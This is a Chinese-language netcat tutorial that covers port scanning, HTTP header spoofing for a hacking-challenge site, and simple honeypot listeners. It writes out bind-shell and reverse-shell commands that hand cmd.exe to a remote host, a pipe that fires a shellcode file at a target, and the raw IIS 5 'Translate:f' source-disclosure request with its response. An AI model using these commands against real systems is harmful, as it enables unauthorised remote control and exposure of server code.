nc命令详解
netcat被誉为网络安全界的‘瑞士军刀'，相信没有什么人不认识它吧...... 
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具， 
能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几 
乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。 

在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由‘红与黑'编译 
后的新‘浓缩'版。‘浓缩'版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法， 
有此功能的原版NC好象要60KB：P），虽然"体积"小，但很完成很多工作。 

1、基本使用 
想要连接到某处: nc [-options] hostname port[s] [ports] ... 
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 
参数: 
-e prog 程序重定向，一旦连接，就执行 [危险!!] 
-g gateway source-routing hop point[s], up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h 帮助信息 
-i secs 延时的间隔 
-l 监听模式，用于入站连接 
-n 指定数字的IP地址，不能用hostname 
-o file 记录16进制的传输 
-p port 本地端口号 
-r 任意指定本地及远程端口 
-s addr 本地源地址 
-u UDP模式 
-v 详细输出――用两个-v可得到更详细的内容 
-w secs timeout的时间 
-z 将输入输出关掉――用于扫描时 
其中端口号可以指定一个或者用lo-hi式的指定范围。 
例如：扫描端口 
tcp扫描 
C:\nc>nc -v -z -w2 192.168.0.80 1-140 
net [192.168.0.80] 140 (?) 
net [192.168.0.80] 139 (netbios-ssn) open 
net [192.168.0.80] 138 (?) 
net [192.168.0.80] 137 (netbios-ns) 
net [192.168.0.80] 136 (?) 
net [192.168.0.80] 135 (epmap) open 
net [192.168.0.80] 81 (?) open 
net [192.168.0.80] 80 (http) open 
net [192.168.0.80] 79 (finger) 
net [192.168.0.80] 25 (smtp) open 
net [192.168.0.80] 24 (?) 
net [192.168.0.80] 23 (telnet) 
net [192.168.0.80] 21 (ftp) 
udp扫描 
C:\nc>nc -u -v -z -w2 192.168.0.80 1-140 
net [192.168.0.80] 140 (?) open 
net [192.168.0.80] 139 (?) open 
net [192.168.0.80] 138 (netbios-dgm) open 
net [192.168.0.80] 137 (netbios-ns) open 
net [192.168.0.80] 54 (?) open 
net [192.168.0.80] 53 (domain) open 
net [192.168.0.80] 38 (?) open 
net [192.168.0.80] 37 (time) open 
net [192.168.0.80] 7 (echo) open 
二、高级应用 
1．Window用法： 
（1）IE的MIME欺骗 
http://www.try2hack..nl(?.....客技术的人去做实验的站点) 
打开这个页面，有http://www.try2hack.nl/cgi-bin/level7.pl页面（这个网站提供了黑客的8关，过了这8关证明你开始入门了），这个页面告诉我们的浏览器不是 IE6.72,我们的*作系统不是LIUNX,我们不是从www.microsoft.com/ms.htm重定向链接过去的，有病阿（这是一个题目呀，要慢慢研究），linux有IE6.72? 微软会在它的页面上放http://www.try2hack.nl/cgi-bin/level7.pl的链接？看看页面的源代码，level7.pl是在服务器端 执行的perl脚本，根本无法看到，还是研究一下IE5和它通信时都告诉了它什么，抓包，我们会发现，我们的IE5告诉对方： 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈，level7.pl这个cgi应该是根据这些信息知道我们不是它要求的 客户，嘿嘿，需要欺骗对方才行，用军刀来可以实现，如下做就可以哄对方了： 
nc http://www.try2hack.nl 80 [enter] 
GET /cgi-bin/level7.pl HTTP/1.1 [enter] 
Accept: image/gif, image/x-xbitmap, application/msword, */* [enter] 
Refererhttp://www.microsoft.com/ms.htm [enter] 
Accept-Language: zh-cn [enter] 
Accept-Encoding: gzip, deflate [enter] 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) [enter] 
Host: http://www.try2hack.nl [enter] 
Connection: 
Keep-Alive [enter] 
注意，如果出现HTTP 400时，说明你输入格式有问题，出现httpd 200回应时，就给出结果了： 
哈哈！赶快去实现一下（实践是成功之母） 
（2）IIS 5 “Translate:f” 显示代码脆弱点 
Translate:f脆弱点的机制：发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型（例如.ASP或者global.asa）。这些文件是用于服务器上运行的，绝不会到客户机上去，而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上，而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f，并有一个反斜杠”\”附于URL之后。下面就有这样的一个例子（[CRLF]代表回车字符） 
注意 GET global.asa 后的反斜杠以及Translate:f头信息。 
GET /global.asa\ HTTP/1.0 
Host:192.168.0.1 
User-Agent:SensePostData 
Content-Type:application/x-www-form-urlencoded 
Translate:f 
[CRLF] 
[CRLF] 
将以上内容保存在一个文本文件中（例如example.txt） 
然后向一个有这个漏洞的服务器发送 
c:\>type example.txt | nc Cnvv 192.168.0.80 80 
(UNKNOWN) [192.168.0.80] 80 (?) open 
HTTP/1.1 200 OK 
Server: Microsoft-IIS/5.0 
Date: Tue, 03 Dec 2002 08:50:46 GMT 
Content-Type: application/octet-stream 
Content-Length: 2790 
ETag: “0448299fcd6df1:bea” 
Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT 
Accept-Ranges: bytes 
Cache-Control: no-cache 



举例：

1)连接到REMOTE主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口


2)监听LOCAL主机，例子：
格式：nc -l -p 80
讲解：监听本机的TCP80端口


3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口


4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口


5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口


以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......）。

=====================================================================================================
高级用法：

6)作攻击程序用，例子：
格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:\exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果，
真是有异曲同工之妙:P)

附：'c:\exploit.txt'为shellcode等


7)作蜜罐用[1]，例子：
格式：nc -L -p 80
讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止



8)作蜜罐用[2]，例子：
格式：nc -L -p 80 > c:\log.txt
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把‘>'
改为‘>>'即可以追加日志

附：'c:\log.txt'为日志等


9)作蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:\honeypot.txt
格式2：type.exe c:\honeypot.txt|nc -L -p 80
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容‘送'入其
管道中